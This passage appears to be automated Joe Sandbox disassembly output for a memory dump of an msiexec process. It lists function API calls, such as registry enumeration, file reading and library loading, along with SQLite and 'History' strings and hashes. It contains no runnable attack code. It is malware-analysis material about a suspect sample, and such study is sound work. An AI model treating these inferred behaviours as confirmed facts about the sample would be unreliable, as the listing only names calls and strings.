                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                    APIs
                                                                    Strings
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                    • memset.MSVCRT ref: 0040C439
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1265369119-0
                                                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: gj
                                                                    • API String ID: 1297977491-4203073231
                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                    • free.MSVCRT ref: 0040E9D3
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$free
                                                                    • String ID:
                                                                    • API String ID: 2241099983-0
                                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                    • malloc.MSVCRT ref: 004174BD
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                    • free.MSVCRT ref: 004174E4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 4053608372-0
                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                    • memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                    • String ID:
                                                                    • API String ID: 1471605966-0
                                                                    • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                    • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                    APIs
                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                    • String ID: \StringFileInfo\
                                                                    • API String ID: 102104167-2245444037
                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _memicmpwcslen
                                                                    • String ID: @@@@$History
                                                                    • API String ID: 1872909662-685208920
                                                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004100FB
                                                                    • memset.MSVCRT ref: 00410112
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                    • String ID: </%s>
                                                                    • API String ID: 3400436232-259020660
                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D58D
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                    • String ID: caption
                                                                    • API String ID: 1523050162-4135340389
                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                    APIs
                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                    • String ID: MS Sans Serif
                                                                    • API String ID: 210187428-168460110
                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcsicmpmemset
                                                                    • String ID: edit
                                                                    • API String ID: 2747424523-2167791130
                                                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                    • API String ID: 3150196962-1506664499
                                                                    • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                    • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3384217055-0
                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                    APIs
                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                    • String ID:
                                                                    • API String ID: 1889144086-0
                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                    APIs
                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                    • String ID:
                                                                    • API String ID: 1661045500-0
                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                    APIs
                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                    Strings
                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                    • API String ID: 1297977491-2063813899
                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040560C
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
